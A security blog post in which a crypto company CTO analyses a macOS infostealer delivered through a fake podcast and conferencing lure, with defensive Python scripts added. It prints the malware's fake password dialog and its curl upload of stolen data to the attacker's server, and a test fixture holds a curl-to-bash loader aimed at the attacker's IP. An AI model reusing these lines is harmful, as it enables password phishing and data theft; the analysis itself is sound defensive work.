If you work in Bitcoin or crypto, you need to read this.
I'm Ben de Waal, CTO at Musqet and an independent Bitcoin technology consultant. A few days ago, someone tried very hard to get me to install malware on my Mac. The social engineering was polished, the fake platform was convincing, and the malware itself was designed to steal everything — browser passwords, crypto wallets, Telegram sessions, Apple Notes, Keychain data, and more.
I didn't run it. Instead, I reverse-engineered it. Here's the full breakdown so you know what to watch for.
It started with a Telegram message from someone calling himself "Alex Knitowski," claiming to be the Director of Web3 Project Management at Capital One.
The profile looked legitimate at first glance — real name, professional bio, profile photo. He said he wanted me to appear on a podcast to discuss Bitcoin technology and had clearly done his homework. He had a prepared list of questions that were relevant to my actual work. This wasn't a lazy spray-and-pray attack. Someone had researched me.
He directed me to a platform called "jandi.social" to join the recording session. The site looked like a professional conferencing tool, complete with a waiting room full of other "participants."
Notice the details: the meeting is titled "Capital One x Ben de Waal," there are multiple participants with photos and names already waiting, and the interface claims to be "end-to-end encrypted and secure." It all looks real.
Then comes the trap.
When you try to join the call, a message pops up telling you the video conference "is only available in the desktop version." You're prompted to download their client application.
This is the moment the attack pivots from social engineering to malware delivery.
At this point, my instincts kicked in. Legitimate conferencing platforms all offer a browser client: Zoom, Google Meet and Teams can each be joined from a web page. Requiring a dedicated desktop app download just to join a call is unusual and suspicious.
I asked "Alex" to verify his identity by sending me an email from a Capital One email address. He avoided the request. That confirmed it. When he realised I wasn't going to run the software, he deleted our entire chat history — a classic move to cover tracks.
But I'd already downloaded the installer (without running it) because I wanted to know exactly what it would have done to my machine.
The download is a macOS disk image (DMG) containing an app called "JandiInstaller." When you open it, you're greeted with a polished installer screen featuring an Apple-styled "Certified Developer" badge. Apple issues no such badge; notarization leaves no branding on an installer at all, and the logo is there only to make the next step feel routine.
Look carefully at the setup instructions at the bottom. They're telling you to go into System Settings, navigate to Privacy & Security, and click "Open Anyway". In other words, they're walking you through bypassing macOS Gatekeeper, the security feature that blocks apps which are not signed by an identified developer and notarized by Apple, which is exactly the check that would have stopped this installer.
Legitimate software is signed and notarized so that Gatekeeper lets it run without this dance; an installer that coaches you through Privacy & Security is telling you it failed that check.
Using static analysis in a sandboxed environment, I was able to fully reverse-engineer this malware without ever executing it. Here's what I found.
The app is a universal Mach-O binary (it carries both Intel and Apple Silicon slices) that contains a 23,000-character AppleScript payload encrypted inside it. When you launch the app, it decrypts this script and executes it silently.
Here's what that script does, step by step:
The very first thing the malware does is pop up a fake system dialog asking for your device password:
display dialog "Required Application Helper. Please enter device password
to continue." default answer "" with icon imagePath buttons {"Continue"} ¬
    default button "Continue" with title "Application wants to install Jandi" ¬
    with hidden answer
It uses the real macOS lock icon to look legitimate, and it loops until you enter the correct password: it validates what you type against your actual account, so a wrong guess just brings the dialog back. A genuine macOS authorisation prompt is drawn by the system, not by the app asking for it; an app-drawn dialog that wants your login password is a red flag whatever icon it carries. Once it has your password, the rest of the attack escalates dramatically because it can now run commands with admin privileges.
The malware targets 12 different Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera, Arc, and more) plus Firefox and Waterfox. For each one, it steals cookies, saved login credentials, and web form data.
This is where the attack gets truly aggressive. The malware contains a hardcoded list of nearly 500 browser extension IDs, covering virtually every crypto wallet extension in existence: MetaMask, Phantom, Rabby, and hundreds more. For each one it copies the extension's local storage and database files, which can contain private keys, seed phrases, and session data. Most wallet extensions encrypt their vault with the wallet password, but that only buys time: once the attacker holds the files, a weak password falls to offline cracking.
The script specifically targets the wallet data directories of:
For anyone in the Bitcoin space, this list should be alarming. These are the wallets most commonly used by serious holders.
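To see what that extension sweep would find on your own machine, here is an added example that is not part of the original article and not the malware's own code: it inventories Chromium-family extensions per profile and reports which known wallet IDs have a "Local Extension Settings" store on disk, which is the data a stealer copies and the list you would rotate keys for first. The profile paths for Chrome, Brave and Edge under ~/Library/Application Support and the MetaMask extension ID are assumed from memory rather than taken from the article, and the directory tree the demo builds is constructed.

```python
"""Inventory Chromium-family extensions and flag known wallet IDs (added example)."""
import json
import tempfile
from pathlib import Path

# Assumed profile roots relative to ~/Library/Application Support on macOS.
CHROMIUM_ROOTS = {
    "Chrome": "Google/Chrome",
    "Brave": "BraveSoftware/Brave-Browser",
    "Edge": "Microsoft Edge",
}

# Known wallet extension IDs (assumed; extend from your own list). The article
# says the stealer carries roughly 500 of these.
WALLET_IDS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
}


def extension_name(ext_dir, ext_id):
    """Best-effort display name from the newest version's manifest.json."""
    for version_dir in sorted(ext_dir.iterdir(), reverse=True):
        manifest = version_dir / "manifest.json"
        if not manifest.is_file():
            continue
        try:
            name = json.loads(manifest.read_text(encoding="utf-8")).get("name", "")
        except (OSError, ValueError):
            continue
        # Localised names look like "__MSG_appName__"; fall back to the ID.
        if name and not name.startswith("__MSG_"):
            return name
    return ext_id


def inventory(app_support, wallet_ids=WALLET_IDS):
    """One record per installed extension across every browser profile."""
    records = []
    for browser, rel in CHROMIUM_ROOTS.items():
        root = Path(app_support) / rel
        if not root.is_dir():
            continue
        for profile in root.iterdir():
            ext_root = profile / "Extensions"
            if not ext_root.is_dir():
                continue
            for ext_dir in ext_root.iterdir():
                if not ext_dir.is_dir():
                    continue
                ext_id = ext_dir.name
                # This per-extension LevelDB store is what the stealer copies.
                store = profile / "Local Extension Settings" / ext_id
                records.append({
                    "browser": browser,
                    "profile": profile.name,
                    "id": ext_id,
                    "name": extension_name(ext_dir, ext_id),
                    "wallet": wallet_ids.get(ext_id),
                    "has_local_store": store.is_dir(),
                })
    return records


def wallets_at_risk(app_support, wallet_ids=WALLET_IDS):
    """Wallet extensions whose local store exists: rotate these first."""
    return [r for r in inventory(app_support, wallet_ids)
            if r["wallet"] and r["has_local_store"]]


def build_sample_tree():
    """Constructed Application Support layout in a temp dir, for the demo only."""
    base = Path(tempfile.mkdtemp(prefix="appsupport-"))
    chrome = base / "Google/Chrome/Default"
    brave = base / "BraveSoftware/Brave-Browser/Profile 1"
    layout = [  # (profile, extension id, version dir, manifest name, has store)
        (chrome, "nkbihfbeogaeaoehlefnkodbefgpgknn", "12.0.0_0", "__MSG_appName__", True),
        (chrome, "cjpalhdlnbpafiamejdnhcphjbkeiagm", "1.58.0_0", "uBlock Origin", False),
        (brave, "nkbihfbeogaeaoehlefnkodbefgpgknn", "12.1.0_0", "MetaMask", False),
    ]
    for profile, ext_id, version, name, has_store in layout:
        mdir = profile / "Extensions" / ext_id / version
        mdir.mkdir(parents=True, exist_ok=True)
        (mdir / "manifest.json").write_text(
            json.dumps({"name": name, "version": version.split("_")[0]}), encoding="utf-8")
        if has_store:
            (profile / "Local Extension Settings" / ext_id).mkdir(parents=True, exist_ok=True)
    return base


if __name__ == "__main__":
    root = build_sample_tree()  # on a real Mac: Path.home() / "Library/Application Support"
    for r in wallets_at_risk(root):
        print(f"{r['browser']}/{r['profile']}: {r['name']} ({r['id']}) has a local store")
```

On a real machine point `inventory` at ~/Library/Application Support; the constructed tree is only there so the script runs offline. Version directories are sorted lexically, so "best-effort" means exactly that for unusual version strings.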
Using the password you entered in step 1, the malware copies your login.keychain-db, the macOS Keychain database holding every password, certificate and secure note stored on your Mac. That file is encrypted with your login password, which the attacker now has, so it can be opened offline at leisure.
The malware scans your Desktop and Documents folders for files with specific extensions (.wallet, .key, .keys, .seed, .kdbx KeePass databases, .pdf, .doc, .txt and common image formats), collecting up to 10 MB of them in total.
It copies your entire Apple Notes database (where many people keep sensitive information) and your Telegram session files — enough to clone your Telegram account onto another device.
All of this stolen data gets zipped up and uploaded to the attacker's server over plain HTTP, so it also crosses the wire in the clear:
curl -X POST -H "buildid: 2befc333db944c2c96364e97e7d97a7c" \
  -H "username: ..." --data-binary @/tmp/xdivcmp.zip \
  http://something0x.at/log
If the upload fails, it retries up to 10 times over the next 10 minutes.
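The upload above leaves a recognisable shape in any proxy or egress log: a POST to a bare domain over cleartext HTTP, carrying custom buildid and username headers and a multi-megabyte body. As an added example that is not part of the article, the following Python turns those traits into a detection. The JSON-lines log format and the four sample records are constructed and assumed; the host, IP, upload path and header names are the ones the article reports.

```python
"""Flag stealer-style uploads in a constructed HTTP proxy log (added example)."""
import ipaddress
import json

# Indicators reported in the article.
IOC_HOSTS = {"something0x.at", "192.253.248.181"}
# Non-standard request headers the sample's curl upload carries.
STEALER_HEADERS = {"buildid", "username"}
LARGE_POST = 1024 * 1024  # 1 MiB; tune for your environment

# Constructed JSON-lines proxy records (assumed format, not real traffic).
SAMPLE_LOG = """\
{"ts":"2025-01-10T10:00:01Z","src":"10.0.0.5","method":"GET","scheme":"https","host":"www.apple.com","path":"/","req_headers":{"user-agent":"Safari"},"body_bytes":0,"status":200}
{"ts":"2025-01-10T10:00:05Z","src":"10.0.0.5","method":"POST","scheme":"http","host":"something0x.at","path":"/log","req_headers":{"buildid":"2befc333db944c2c96364e97e7d97a7c","username":"analyst","content-type":"application/x-www-form-urlencoded"},"body_bytes":8431022,"status":200}
{"ts":"2025-01-10T10:01:05Z","src":"10.0.0.5","method":"GET","scheme":"http","host":"192.253.248.181","path":"/","req_headers":{"user-agent":"curl/8.4.0"},"body_bytes":0,"status":200}
{"ts":"2025-01-10T10:02:00Z","src":"10.0.0.7","method":"POST","scheme":"https","host":"api.github.com","path":"/graphql","req_headers":{"authorization":"bearer REDACTED"},"body_bytes":512,"status":200}
"""


def is_ip_literal(host):
    """True when the Host is a raw IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(rec):
    """Return the reasons one proxy record looks like exfiltration ([] if none)."""
    reasons = []
    host = str(rec.get("host", "")).lower()
    method = str(rec.get("method", "")).upper()
    hdrs = {str(k).lower(): str(v) for k, v in (rec.get("req_headers") or {}).items()}
    ua = hdrs.get("user-agent", "").lower()

    if host in IOC_HOSTS:
        reasons.append("known C2 indicator")
    hit = set(hdrs) & STEALER_HEADERS
    if method == "POST" and hit:
        reasons.append("custom stealer headers: " + ",".join(sorted(hit)))
    if method == "POST" and rec.get("scheme") == "http" and rec.get("body_bytes", 0) >= LARGE_POST:
        reasons.append("large cleartext POST")
    # Heuristic: second-stage fetches often go straight to an IP with curl.
    if is_ip_literal(host) and ua.startswith("curl/"):
        reasons.append("curl to a bare IP address")
    return reasons


def scan(log_text):
    """Parse a JSON-lines proxy log and return the flagged records with reasons."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # skip a malformed line rather than abort the whole scan
        reasons = classify(rec)
        if reasons:
            findings.append({"ts": rec.get("ts"), "src": rec.get("src"),
                             "host": rec.get("host"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["src"], "->", f["host"], "|", "; ".join(f["reasons"]))
```

The indicator match is the only high-confidence rule; the header, size and curl-to-IP rules are behavioural and will need tuning, but they are what survives once the attacker rotates domains. The article's retry behaviour (up to ten POSTs over ten minutes) is a further signal worth adding as a per-source count.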
This is the part that elevates this from "data theft" to "ongoing compromise." If the malware obtained your password, it contacts a second server at 192.253.248.181, downloads a LaunchDaemon configuration, and installs it with root privileges. LaunchDaemons start as root at every boot, before any user logs in, so the attacker's code survives reboots and runs with full system access. This means:
Your Mac is now part of a botnet.
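Because the persistence lives in a launchd plist, it is also where an incident responder looks first. As an added example that is not part of the article (and not the sample's own plist, which the author does not reproduce), this Python audits a directory of launchd plists for the traits a dropped daemon tends to have: it wraps an interpreter or downloader, runs from a temp or user-writable path, reaches a raw IP over cleartext HTTP, or is pinned to run continuously. The two plists it writes are constructed for the demo; the Apple-looking label and the curl-to-IP loader are assumptions about what such a payload looks like, not recovered from this sample.

```python
"""Audit launchd plists for stealer-style persistence (added example)."""
import plistlib
import re
import tempfile
from pathlib import Path

IP_LITERAL = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# Interpreters and downloaders that dropped daemons typically wrap.
RISKY_BINARIES = {"curl", "osascript", "bash", "sh", "zsh", "python", "python3"}
# Places a root daemon has no business executing from.
RISKY_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/")


def audit_plist(path):
    """Return the reasons one launchd plist looks suspicious ([] if none)."""
    path = Path(path)
    try:
        with path.open("rb") as fp:
            job = plistlib.load(fp)
    except (OSError, plistlib.InvalidFileException, ValueError) as exc:
        return [f"unparseable plist: {exc}"]
    if not isinstance(job, dict):
        return ["top-level object is not a dict"]

    argv = [str(a) for a in (job.get("ProgramArguments") or [])]
    if job.get("Program"):
        argv.insert(0, str(job["Program"]))
    if not argv:
        return ["no Program or ProgramArguments"]
    cmdline = " ".join(argv)
    reasons = []
    exe = Path(argv[0]).name
    if exe in RISKY_BINARIES:
        reasons.append(f"wraps an interpreter or downloader: {exe}")
    if any(a.startswith(RISKY_PREFIXES) for a in argv):
        reasons.append("executes from a temp or user-writable path")
    if IP_LITERAL.search(cmdline):
        reasons.append("command line contains a raw IP address")
    if "http://" in cmdline:
        reasons.append("fetches over cleartext HTTP")
    if job.get("RunAtLoad") and (job.get("KeepAlive") or job.get("StartInterval")):
        reasons.append("RunAtLoad plus KeepAlive/StartInterval: runs continuously")
    label = str(job.get("Label", ""))
    if label and label != path.stem:
        reasons.append(f"Label {label!r} does not match the filename")
    return reasons


def audit_dir(directory):
    """Map each flagged plist filename in `directory` to its list of reasons."""
    findings = {}
    for plist in sorted(Path(directory).glob("*.plist")):
        reasons = audit_plist(plist)
        if reasons:
            findings[plist.name] = reasons
    return findings


def build_sample_dir():
    """Write two constructed plists to a temp dir: one benign, one stealer-style."""
    d = Path(tempfile.mkdtemp(prefix="launchdaemons-"))
    benign = {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
        "StartCalendarInterval": {"Hour": 2, "Minute": 0},
    }
    # Constructed: an Apple-looking label wrapping a curl|bash loader that pulls
    # from the second-stage IP the article names. Not the sample's real plist.
    dropped = {
        "Label": "com.apple.update-helper",
        "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL http://192.253.248.181/ | bash"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    for job in (benign, dropped):
        with (d / f"{job['Label']}.plist").open("wb") as fp:
            plistlib.dump(job, fp)
    return d


if __name__ == "__main__":
    # On a real Mac: audit_dir("/Library/LaunchDaemons") and ~/Library/LaunchAgents.
    for name, reasons in audit_dir(build_sample_dir()).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a real Mac run it over /Library/LaunchDaemons and, for user-level persistence, ~/Library/LaunchAgents; Apple's own daemons live under /System/Library and should not be in the third-party directory at all. Treat the output as triage rather than verdict, and on a live host also check that each plist is owned by root:wheel and that the binary it points at is signed.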
This attack pattern — fake podcast invitations targeting people in crypto, macOS-specific AppleScript infostealers, massive wallet extension lists — is consistent with campaigns attributed to both North Korean state-sponsored groups (Lazarus/APT38) and organized Eastern European cybercrime operations. These groups have stolen billions from the crypto industry using exactly this playbook.
The specific technical indicators from this sample (the C2 infrastructure, build IDs, and stealer architecture) place it in the same family as known macOS stealers like Atomic Stealer (AMOS), MacSync Stealer, and Odyssey Stealer.
If someone invites you to a podcast or interview:
If you're a macOS user:
If you hold crypto:
If you think you may have already run something like this:
/Library/LaunchDaemons/ for any plists you don't recognise.
The level of effort in this attack is striking. Someone researched my background, prepared relevant interview questions, built a convincing fake conferencing platform with fake participants, created a polished macOS installer with Apple branding, and wrote a comprehensive stealer that targets every conceivable source of value on a Mac.
This isn't amateur hour. These are professional operations, and they're targeting people in the Bitcoin and crypto space specifically because that's where the money is.
Stay paranoid. Verify everything. And if something feels off — trust that instinct.
Ben de Waal is the CTO of Musqet and an independent Bitcoin technology consultant. The reverse engineering analysis described in this article was performed using static analysis in a sandboxed environment — the malware was never executed.